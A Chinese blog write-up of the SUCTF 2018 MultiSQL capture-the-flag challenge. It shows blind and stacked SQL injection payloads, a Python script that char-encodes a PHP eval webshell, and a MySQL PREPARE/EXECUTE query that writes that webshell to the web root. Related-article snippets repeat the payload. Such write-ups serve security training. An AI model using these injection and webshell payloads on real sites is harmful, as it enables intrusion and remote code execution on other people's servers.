[SUCTF 2018]MultiSQL MYSQL 预处理写

于 2023-12-13 16:23:27 发布
阅读量787 收藏 8
点赞数 5
分类专栏: BUUctf 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134974968
版权

首先这道题需要预处理写马 之前在ctfshow中学习过预处理

我们来看看

CTFSHOW -SQL 注入-CSDN博客

首先我们开始判断是否存在注入

2^(if(1=0,1,0))

2^(if(ascii(mid(user(),1,1))>0,0,1))

判断出存在sql注入

然后我们开始fuzz  发现 select ,union 都没了

但是我们如果 ; 发现可以闭合 所以这里是存在堆叠注入的

但是是没有回显的

1;show databases;

所以我们看看能不能写木马

select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php

这个是我们的木马

然后我们进行预处理

但是这里select 被过滤了
 
所以我们使用char 拼接绕过

str = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str = len(str)
for i in range(0,len_str):
    if i==0:
        print('char(%s' %ord(str[i]),end='')
    else:
        print(',%s' %ord(str[i]),end='')
print(')')

char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

然后直接执行

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare abcd from @sql;execute abcd;

这里就实现了绕过 并且执行了命令

/favicon/shell.php

即可实现

双层小牛堡
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1285
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 594
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
[SUCTF 2018]MultiSQL
qq_45691294的博客
10-10 1414
打开题目,是一个页面,只有登录 注册功能可以正常使用 先注册一个账号,注册后自动登录,登录之后看到 在用户信息处可以查看到自己的信息 编辑头像处可以上传头像图片,可能存在文件上传漏洞 前端对文件后缀名进行了过滤,但是上传php文件,存入的依旧是图片文件 那再看看刚才的查看信息的页面,发现url如下 http://e0063ae7-b2ce-42cd-bf4b-9341c0e87bf9.node3.buuoj.cn/user/user.php?id=2 将id的参数改为1 存在越权,也可能存在SQL
[SUCTF 2018]MultiSQL(mysql预编译)
paidx0
07-12 335
[SUCTF 2018]MultiSQL(mysql预编译)
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 996
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后入webshell,最后得flag,反过来分析,通过上传文件给了一个可读权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有入权限呢,因为文件上传都是传到了这个目录的里面,所以有可的权限。
python3 mysql 预处理补丁
02-08
python3对mysql预处理支持并不是很好,网上很多人说python并不支持mysql预处理,其实mysql官方是有提供支持的,但是依然不友好,所以本人修改源码提供了补丁,以期python3能像php那样支持mysql预处理
PHP MySQL 预处理语句
01-03
预处理语句对于防止 MySQL 注入是非常有用的。 预处理语句及绑定参数 预处理语句用于执行多个相同的 SQL 语句,并且执行效率更高。 预处理语句的工作原理如下: 预处理:创建 SQL 语句模板并发送到数据库。预留的值...
理解Mysql prepare预处理语句
09-10
主要帮助大家学习理解Mysql prepare预处理语句,对prepare预处理语句感兴趣的小伙伴们可以参考一下
PHP MySQL 预处理语句:读取数据:Where子句.md
最新发布
06-13
在 PHP 中使用 MySQL 预处理语句(prepared statements)是一种推荐的方式来执行数据库操作,特别是当涉及到用户输入时。预处理语句可以帮助防止 SQL 注入攻击,因为它们会将数据与 SQL 查询语句分开处理。
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 380
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 238
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理sql
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2307
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 257
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 366
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
BUUCTF:[SUCTF2018]single dog
末初的CSDN博客
11-03 2187
题目地址:https://buuoj.cn/challenges#[SUCTF2018]single%20dog attachment.jpg binwalk分析,foremost分离 aaencode编码 AAEncode:http://www.atoolbox.net/Tool.php?Id=703 flag{happy double eleven}
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 4万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)
笑花大王
02-09 870
简介 原题复现: 1 <?php 2 session_start(); 3 4 include_once "config.php"; 5 6 $post = array(); 7 $get = array(); 8 global $MysqlLink; 9 10 //GetPara(); 11 $...
Buuctf之Web(四)
qq_50589021的博客
11-22 1482
[HFCTF2020]JustEscape WP vm2沙盒逃逸 涉及到nodejs不会 [网鼎杯2018]Unfinish 脚本 # -*- coding: utf-8 -*- # @Author : Yn8rt # @Time : 2021/9/10 14:38 #coding:utf-8 import requests from bs4 import BeautifulSoup import time url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b
mysql预处理
05-26
MySQL预处理是一种提高SQL查询性能和安全性的技术。它通过将SQL语句分为两个部分来实现:预处理和执行。预处理阶段将SQL语句发送到MySQL服务器,MySQL服务器将其解析并进行语法分析,然后将其编译成一种内部格式。在执行阶段,应用程序指定查询参数并将其绑定到预处理语句中,然后将查询发送到MySQL服务器执行。 使用MySQL预处理可以带来以下好处: 1. 提高性能:预处理语句只需要编译一次,然后可以多次执行,这比每次执行SQL语句都需要进行解析和编译要快得多。 2. 防止SQL注入攻击:预处理语句可以防止SQL注入攻击,因为参数值与SQL语句分开处理,攻击者无法通过修改参数值来修改SQL语句的结构。 3. 提高可读性:使用预处理语句可以使SQL语句更易于理解和维护,因为参数值是以占位符的形式传递,而不是混合在SQL语句中。 使用MySQL预处理需要以下步骤: 1. 准备SQL语句并将其发送到MySQL服务器以进行预处理。 2. 将查询参数绑定到预处理语句中。 3. 执行预处理语句。 4. 获取查询结果(如果有的话)。 以下是一个使用MySQL预处理的示例: ```sql -- 准备SQL语句并进行预处理 PREPARE stmt FROM 'SELECT * FROM customers WHERE id = ?'; -- 将参数绑定到预处理语句中 SET @id = 1; EXECUTE stmt USING @id; -- 获取查询结果 DEALLOCATE PREPARE stmt; ``` 在这个例子中,我们准备了一个SQL语句,并将其发送到MySQL服务器以进行预处理。然后,我们将查询参数绑定到预处理语句中,并执行预处理语句。最后,我们获取查询结果并释放预处理语句。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值